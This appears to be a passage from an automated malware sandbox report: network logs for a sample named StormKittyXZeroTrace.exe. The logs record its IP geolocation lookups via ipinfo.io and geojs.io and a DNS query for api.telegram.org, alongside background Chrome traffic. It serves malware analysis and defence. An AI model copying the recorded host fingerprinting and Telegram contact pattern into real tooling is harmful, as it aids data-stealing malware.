Mar 14, 2025 14:22:28.270030022 CET	50694	53	192.168.2.7	1.1.1.1
Mar 14, 2025 14:22:28.276859999 CET	53	50694	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Mar 14, 2025 14:22:12.502258062 CET	192.168.2.7	1.1.1.1	0xddd2	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:22:15.285576105 CET	192.168.2.7	1.1.1.1	0x84d1	Standard query (0)	41.140.13.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false
Mar 14, 2025 14:22:21.369774103 CET	192.168.2.7	1.1.1.1	0xfa80	Standard query (0)	get.geojs.io	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:22:24.690325975 CET	192.168.2.7	1.1.1.1	0xf787	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:22:24.690510988 CET	192.168.2.7	1.1.1.1	0xc408	Standard query (0)	www.google.com	65	IN (0x0001)	false
Mar 14, 2025 14:22:28.270030022 CET	192.168.2.7	1.1.1.1	0x567c	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Mar 14, 2025 14:22:12.509372950 CET	1.1.1.1	192.168.2.7	0xddd2	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:22:15.295239925 CET	1.1.1.1	192.168.2.7	0x84d1	Name error (3)	41.140.13.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false
Mar 14, 2025 14:22:21.376451015 CET	1.1.1.1	192.168.2.7	0xfa80	No error (0)	get.geojs.io		104.26.1.100	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:22:21.376451015 CET	1.1.1.1	192.168.2.7	0xfa80	No error (0)	get.geojs.io		172.67.70.233	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:22:21.376451015 CET	1.1.1.1	192.168.2.7	0xfa80	No error (0)	get.geojs.io		104.26.0.100	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:22:24.696922064 CET	1.1.1.1	192.168.2.7	0xc408	No error (0)	www.google.com			65	IN (0x0001)	false
Mar 14, 2025 14:22:24.697097063 CET	1.1.1.1	192.168.2.7	0xf787	No error (0)	www.google.com		142.250.185.196	A (IP address)	IN (0x0001)	false
Mar 14, 2025 14:22:28.276859999 CET	1.1.1.1	192.168.2.7	0x567c	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

get.geojs.io

www.google.com

api.telegram.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49681	34.117.59.81	443	7108	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 13:22:13 UTC	59	OUT	GET / HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2025-03-14 13:22:13 UTC	457	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 321 content-type: application/json; charset=utf-8 date: Fri, 14 Mar 2025 13:22:13 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-03-14 13:22:13 UTC	321	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 34 30 2e 37 31 34 33 2c 2d 37 34 2e 30 30 36 30 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 31 30 30 30 31 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a Data Ascii: { "ip": "8.46.123.189", "hostname": "static-cpe-8-46-123-189.centurylink.com", "city": "New York City", "region": "New York", "country": "US", "loc": "40.7143,-74.0060", "org": "AS3356 Level 3 Parent, LLC", "postal": "10001", "timezone":

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.7	49682	104.26.1.100	443	7108	C:\Users\user\Desktop\StormKittyXZeroTrace.exe.bin.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 13:22:21 UTC	76	OUT	GET /v1/ip/geo.json HTTP/1.1 Host: get.geojs.io Connection: Keep-Alive
2025-03-14 13:22:22 UTC	1124	IN	HTTP/1.1 200 OK Date: Fri, 14 Mar 2025 13:22:21 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close x-request-id: ad8ff2a9584886356d60b668061a81b2-ASH strict-transport-security: max-age=15552000; includeSubDomains; preload access-control-allow-origin: * access-control-allow-methods: GET pragma: no-cache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 geojs-backend: ash-01 cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=aogn0RLR3j9%2Ff53h%2BgXkvqAvmIc%2Fe2TkVliq955CvvdWv44LWwkOx8Ji0eVar8qbOkX1gdF0J%2FdMIOZSs2eqH5CGvxljPD994rWxhqSnkk6iPvUyaEuaJQ7wQ4mXpQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} X-Content-Type-Options: nosniff Server: cloudflare CF-RAY: 920414572d0fc43b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2051&min_rtt=1756&rtt_var=1249&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2814&recv_bytes=690&delivery_rate=708565&cwnd=182&unsent_bytes=0&cid=56b8b83ed44eb030&ts=153&x=0"
2025-03-14 13:22:22 UTC	245	IN	Data Raw: 31 34 36 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 5c 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 61 63 63 75 72 61 63 79 22 3a 32 30 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 22 3a 22 41 53 33 33 35 36 20 4c 45 56 45 4c 33 22 2c 22 61 73 6e 22 3a 33 33 35 36 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 61 72 65 61 5f 63 6f 64 65 22 3a 22 30 22 2c 22 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 5f 6e 61 6d 65 22 3a 22 4c 45 56 45 4c 33 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 33 22 3a 22 55 53 41 22 2c 22 63 6f 6e 74 69 6e 65 6e 74 5f 63 6f 64 65 22 3a 22 4e 41 22 Data Ascii: 146{"ip":"8.46.123.189","timezone":"America\/New_York","accuracy":20,"organization":"AS3356 LEVEL3","asn":3356,"city":"New York","area_code":"0","organization_name":"LEVEL3","country":"United States","country_code3":"USA","continent_code":"NA"
2025-03-14 13:22:22 UTC	88	IN	Data Raw: 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 6c 61 74 69 74 75 64 65 22 3a 22 34 30 2e 37 31 32 36 22 2c 22 6c 6f 6e 67 69 74 75 64 65 22 3a 22 2d 37 34 2e 30 30 36 36 22 7d 0a 0d 0a Data Ascii: ,"country_code":"US","region":"New York","latitude":"40.7126","longitude":"-74.0066"}
2025-03-14 13:22:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49693	142.250.185.196	443	6520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 13:22:26 UTC	589	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiKo8sBCIWgzQEI9s/OAQiB1s4BCMnczgEIhODOAQii5M4BCK/kzgEI6eTOAQ== Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-14 13:22:26 UTC	1303	IN	HTTP/1.1 200 OK Date: Fri, 14 Mar 2025 13:22:26 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-cPLuqnO0L_flbJQCExKr8w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Downlink Accept-CH: RTT Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-14 13:22:26 UTC	87	IN	Data Raw: 33 37 31 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 65 76 65 72 61 6e 63 65 20 65 70 69 73 6f 64 65 20 39 20 72 65 63 61 70 22 2c 22 63 6f 6c 6c 65 67 65 20 66 6f 6f 74 62 61 6c 6c 20 32 36 20 63 6f 76 65 72 22 2c 22 6a 6f 61 6e 6e 20 67 69 66 74 20 63 61 72 64 Data Ascii: 371)]}'["",["severance episode 9 recap","college football 26 cover","joann gift card
2025-03-14 13:22:26 UTC	801	IN	Data Raw: 73 20 6e 6f 20 6c 6f 6e 67 65 72 20 61 63 63 65 70 74 65 64 22 2c 22 61 76 6f 77 65 64 20 75 70 64 61 74 65 20 70 61 74 63 68 20 6e 6f 74 65 73 22 2c 22 62 69 67 20 62 65 61 72 20 62 61 6c 64 20 65 61 67 6c 65 73 20 6e 65 73 74 22 2c 22 6f 70 65 6e 20 77 6f 72 6b 6f 75 74 20 32 35 2e 33 22 2c 22 77 65 64 64 69 6e 67 20 63 61 6b 65 20 63 6f 6f 6b 69 65 20 63 6f 6f 6b 69 65 20 72 75 6e 22 2c 22 73 6f 63 69 61 6c 20 73 65 63 75 72 69 74 79 20 61 64 6d 69 6e 69 73 74 72 61 74 69 6f 6e 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 Data Ascii: s no longer accepted","avowed update patch notes","big bear bald eagles nest","open workout 25.3","wedding cake cookie cookie run","social security administration"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groups
2025-03-14 13:22:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49696	142.250.185.196	443	6520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-14 13:22:26 UTC	492	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIk6HLAQiKo8sBCIWgzQEI9s/OAQiB1s4BCMnczgEIhODOAQii5M4BCK/kzgEI6eTOAQ== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-14 13:22:26 UTC	1055	IN	HTTP/1.1 200 OK Version: 735763701 Content-Type: application/json; charset=UTF-8 X-Content-Type-Options: nosniff Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Accept-CH: Sec-CH-Prefers-Color-Scheme Accept-CH: Downlink Accept-CH: RTT Accept-CH: Sec-CH-UA-Form-Factors Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Date: Fri, 14 Mar 2025 13:22:26 GMT Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2025-03-14 13:22:26 UTC	335	IN	Data Raw: 32 34 36 37 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 46 61 20 67 62 5f 32 64 20 67 62 5f 50 65 20 67 62 5f 72 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 Data Ascii: 2467)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Fa gb_2d gb_Pe gb_rd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e
2025-03-14 13:22:26 UTC	1390	IN	Data Raw: 64 20 67 62 5f 70 64 20 67 62 5f 48 64 20 67 62 5f 6d 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 73 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4b 63 20 67 62 5f 52 5c 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 4d 61 69 6e 20 6d 65 6e 75 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 76 67 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 76 69 65 77 62 6f 78 5c 75 30 Data Ascii: d gb_pd gb_Hd gb_md\"\u003e\u003cdiv class\u003d\"gb_xd gb_sd\"\u003e\u003cdiv class\u003d\"gb_Kc gb_R\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u0
2025-03-14 13:22:26 UTC	1390	IN	Data Raw: 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 78 64 20 67 62 5f 39 63 20 67 62 5f 61 64 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 76 64 5c 22 20 61 72 69 61 2d 6c 65 76 65 6c 5c 75 30 30 33 64 5c 22 31 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 68 65 61 64 69 6e 67 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 62 64 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c Data Ascii: e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_xd gb_9c gb_ad\"\u003e\u003cspan class\u003d\"gb_vd\" aria-level\u003d\"1\" role\u003d\"heading\"\u003e \u003c\/span\u003e\u003cdiv class\u003d\"gb_bd\"\u003e \u003c\/div\u003e\u003c\/div\u003e\
2025-03-14 13:22:26 UTC	1390	IN	Data Raw: 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 45 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30 2d 37 30 2e 35 2d 32 38 2e 35 54 31 31 30 2d 32 31 37 71 30 2d 31 34 20 33 2d 32 35 2e 35 74 39 2d 32 31 2e 35 6c 32 32 38 2d 33 34 31 71 31 30 2d 31 34 20 31 35 2d 33 31 74 35 2d 33 34 76 Data Ascii: bindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_E\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0-70.5-28.5T110-217q0-14 3-25.5t9-21.5l228-341q10-14 15-31t5-34v
2025-03-14 13:22:26 UTC	1390	IN	Data Raw: 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 36 2c 36 63 30 2c 31 2e 31 20 30 2e 39 2c 32 20 32 2c 32 73 32 2c 2d 30 2e 39 20 32 2c 2d 32 20 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 7a 4d 31 32 2c 38 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 38 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 Data Ascii: -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM16,6c0,1.1 0.9,2 2,2s2,-0.9 2,-2 -0.9,-2 -2,-2 -2,0.9 -2,2zM12,8c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM18,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9
2025-03-14 13:22:26 UTC	1390	IN	Data Raw: 2d 6c 61 62 65 6c 32 22 5d 2c 22 6d 65 6e 75 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 22 6d 65 6e 75 2d 63 6f 6e 74 65 6e 74 22 2c 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 62 61 72 5f 68 65 69 67 68 74 22 3a 36 30 2c 22 65 78 70 65 72 69 6d 65 6e 74 5f 69 64 22 3a 5b 33 37 30 30 33 32 31 2c 33 37 30 30 39 34 39 2c 33 37 30 31 33 38 34 5d 2c 22 69 73 5f 62 61 63 6b 75 70 5f 62 61 72 22 3a 66 61 6c 73 65 7d 2c 22 70 61 67 65 5f 68 6f 6f 6b 73 22 3a 7b 22 61 66 74 65 72 5f 62 61 72 5f 73 63 72 69 70 74 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 73 63 72 69 70 74 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 74 68 69 73 2e 67 62 61 72 5f 5c 75 30 30 33 64 74 68 69 Data Ascii: -label2"],"menu_placeholder_label":"menu-content","metadata":{"bar_height":60,"experiment_id":[3700321,3700949,3701384],"is_backup_bar":false},"page_hooks":{"after_bar_script":{"private_do_not_access_or_else_safe_script_wrapped_value":"this.gbar_\u003dthi
2025-03-14 13:22:26 UTC	1390	IN	Data Raw: 61 2e 6c 65 6e 67 74 68 3b 69 66 28 62 5c 75 30 30 33 65 30 29 7b 63 6f 6e 73 74 20 63 5c 75 30 30 33 64 41 72 72 61 79 28 62 29 3b 66 6f 72 28 6c 65 74 20 64 5c 75 30 30 33 64 30 3b 64 5c 75 30 30 33 63 62 3b 64 2b 2b 29 63 5b 64 5d 5c 75 30 30 33 64 61 5b 64 5d 3b 72 65 74 75 72 6e 20 63 7d 72 65 74 75 72 6e 5b 5d 7d 3b 41 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e 7a 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5f 2e 42 64 5c 75 30 30 33 64 67 6c 6f 62 61 6c 54 68 69 73 2e 74 72 75 73 74 65 64 54 79 70 65 73 3b Data Ascii: a.length;if(b\u003e0){const c\u003dArray(b);for(let d\u003d0;d\u003cb;d++)c[d]\u003da[d];return c}return[]};Ad\u003dfunction(a){return new _.zd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};_.Bd\u003dglobalThis.trustedTypes;
2025-03-14 13:22:26 UTC	652	IN	Data Raw: 65 77 20 5f 2e 4f 64 28 62 3f 62 2e 63 72 65 61 74 65 53 63 72 69 70 74 55 52 4c 28 61 29 3a 61 29 7d 3b 5f 2e 51 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 4f 64 29 72 65 74 75 72 6e 20 61 2e 69 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b 7d 3b 5f 2e 53 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 52 64 2e 74 65 73 74 28 61 29 29 72 65 74 75 72 6e 20 61 7d 3b 5f 2e 54 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 43 64 29 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 43 64 29 61 5c 75 30 30 33 64 61 2e 69 3b 65 6c 73 65 20 74 68 72 6f 77 20 45 72 72 6f 72 28 5c 22 48 5c 22 29 3b Data Ascii: ew _.Od(b?b.createScriptURL(a):a)};_.Qd\u003dfunction(a){if(a instanceof _.Od)return a.i;throw Error(\"H\");};_.Sd\u003dfunction(a){if(Rd.test(a))return a};_.Td\u003dfunction(a){if(a instanceof _.Cd)if(a instanceof _.Cd)a\u003da.i;else throw Error(\"H\");
2025-03-14 13:22:26 UTC	472	IN	Data Raw: 31 64 31 0d 0a 54 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 6c 65 74 20 64 3b 72 65 74 75 72 6e 28 64 5c 75 30 30 33 64 5f 2e 57 64 28 61 2c 62 29 29 21 5c 75 30 30 33 64 6e 75 6c 6c 3f 64 3a 63 7d 3b 5f 2e 58 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 5c 75 30 30 33 64 30 29 7b 6c 65 74 20 64 3b 72 65 74 75 72 6e 28 64 5c 75 30 30 33 64 5f 2e 53 28 61 2c 62 29 29 21 5c 75 30 30 33 64 6e 75 6c 6c 3f 64 3a 63 7d 3b 5f 2e 59 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 5c 75 30 30 33 64 5f 2e 53 61 28 61 29 3b 72 65 74 75 72 6e 20 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 61 72 72 61 79 5c 22 7c 7c 62 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 22 6f 62 6a 65 63 74 5c Data Ascii: 1d1T\u003dfunction(a,b,c\u003d0){let d;return(d\u003d_.Wd(a,b))!\u003dnull?d:c};_.Xd\u003dfunction(a,b,c\u003d0){let d;return(d\u003d_.S(a,b))!\u003dnull?d:c};_.Yd\u003dfunction(a){var b\u003d_.Sa(a);return b\u003d\u003d\"array\"\|\|b\u003d\u003d\"object\
